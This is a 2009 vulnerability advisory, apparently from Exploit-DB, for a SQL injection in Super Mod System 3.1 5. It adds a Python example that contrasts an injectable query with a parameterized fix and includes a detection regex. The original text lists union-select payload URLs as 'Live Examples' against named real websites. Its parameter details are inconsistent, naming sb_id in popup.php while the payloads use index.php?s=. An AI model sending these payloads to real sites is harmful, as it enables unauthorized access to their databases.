Vendor: Super Mod System
By: MizoZ [EvilWay Team]
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Super Mod System
Affected Version From: 3.1 5
Affected Version To: 3.1 5
Patch Exists: NO
Related CWE: N/A
CPE: a:classified-software:super_mod_system:3.1_5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Super Mod System 3.1 5 SQL Injection Vulnerability

A SQL injection vulnerability exists in Super Mod System 3.1 5, which allows an attacker to execute arbitrary SQL commands via the 'sb_id' parameter in the 'popup.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL code. An example of such a request is: http://www.classified-software.co.uk/super-mod-system-v3/index.php?s=3+and+1=0+union+all+select+1,2,3,4,5--

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
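The following is an added example, not code from the advisory or from the Super Mod System product, showing the defect class the advisory describes and the fix the mitigation calls for. It assumes a lookup page that selects a five-column row by a numeric id taken from a GET parameter, which is the shape the advisory's `union select 1,2,3,4,5--` payload targets; the SQLite table and its rows are constructed sample data, and the request-flagging helper at the end is a minimal detection check over the query string, not a product feature.

```python
"""Union-based SQL injection beside its parameterized fix (added example)."""
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The advisory's payload as it reads after URL decoding ('+' becomes a space).
PAYLOAD = "-6 union select 1,2,3,4,5--"


def make_db() -> sqlite3.Connection:
    """Constructed sample data: five columns, matching the payload's column count."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE listings (id INTEGER PRIMARY KEY, title TEXT, "
        "category TEXT, price REAL, contact TEXT)"
    )
    conn.executemany(
        "INSERT INTO listings VALUES (?, ?, ?, ?, ?)",
        [
            (3, "Used bicycle", "sport", 40.0, "seller-a@example.invalid"),
            (6, "Bookshelf", "furniture", 25.5, "seller-b@example.invalid"),
        ],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, s: str) -> list:
    """CWE-89 pattern: the GET parameter is interpolated into the SQL text,
    so a UNION appended to the id value becomes part of the statement."""
    query = (
        "SELECT id, title, category, price, contact FROM listings "
        f"WHERE id = {s}"  # injection point
    )
    return conn.execute(query).fetchall()


def hardened_lookup(conn: sqlite3.Connection, s: str) -> list:
    """Fix: validate the parameter as a plain integer, then bind it as a
    query parameter so the driver never treats it as SQL syntax."""
    if not re.fullmatch(r"[0-9]{1,10}", s):
        return []  # reject anything that is not a positive integer id
    query = (
        "SELECT id, title, category, price, contact FROM listings "
        "WHERE id = ?"
    )
    return conn.execute(query, (int(s),)).fetchall()


# Detection aid: a UNION followed shortly by SELECT inside a query-string value.
UNION_SELECT = re.compile(r"\bunion\b.{0,40}\bselect\b", re.IGNORECASE | re.DOTALL)


def flag_request(url: str) -> list:
    """Return the names of query parameters whose decoded value carries a
    UNION ... SELECT sequence (useful when reviewing access logs)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return sorted(
        name for name, values in params.items()
        if any(UNION_SELECT.search(v) for v in values)
    )


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, benign id:", vulnerable_lookup(db, "3"))
    print("vulnerable, payload:  ", vulnerable_lookup(db, PAYLOAD))
    print("hardened, benign id:  ", hardened_lookup(db, "3"))
    print("hardened, payload:    ", hardened_lookup(db, PAYLOAD))
    print("flagged parameters:   ", flag_request(
        "http://www.classified-software.co.uk/super-mod-system-v3/"
        "index.php?s=3+and+1=0+union+all+select+1,2,3,4,5--"))
```

Against the constructed table, the vulnerable function returns the attacker-chosen row `(1, 2, 3, 4, 5)` for the payload, while the hardened function returns nothing because the value fails the integer check before any SQL runs; binding the parameter would also have defeated the injection on its own, and the check adds a second layer plus a clear place to log rejected input.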
Source

Exploit-DB raw data:

----------------------------------------------------------------------------------------------------
  Name : Super Mod System 3.1 5
  Site : http://www.classified-software.co.uk/
  Demo : http://www.classified-software.co.uk/super-mod-system-v3/

----------------------------------------------------------------------------------------------------
 
  Found By : MizoZ [EvilWay Team]
  Made in  : Morocco
  Contact  : mizoz[at]9[dot]cn
  Greetz   : Moudi , Zuka , optix , All friends
  Website : BlackArea.org (Coming Soon)
----------------------------------------------------------------------------------------------------

SQL Injection popup.php (GET : sb_id) :
[HOST]/[PATH]/index.php?s=[SQL CODE]

SQL CODE : -6+union+select+1,2,3,4,5--

Live Examples :
http://www.classified-software.co.uk/super-mod-system-v3/index.php?s=3+and+1=0+union+all+select+1,2,3,4,5--
http://www.thepharmaclassifieds.com/index.php?s=-6+union+select+1,2,3,4,5--

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-07-27]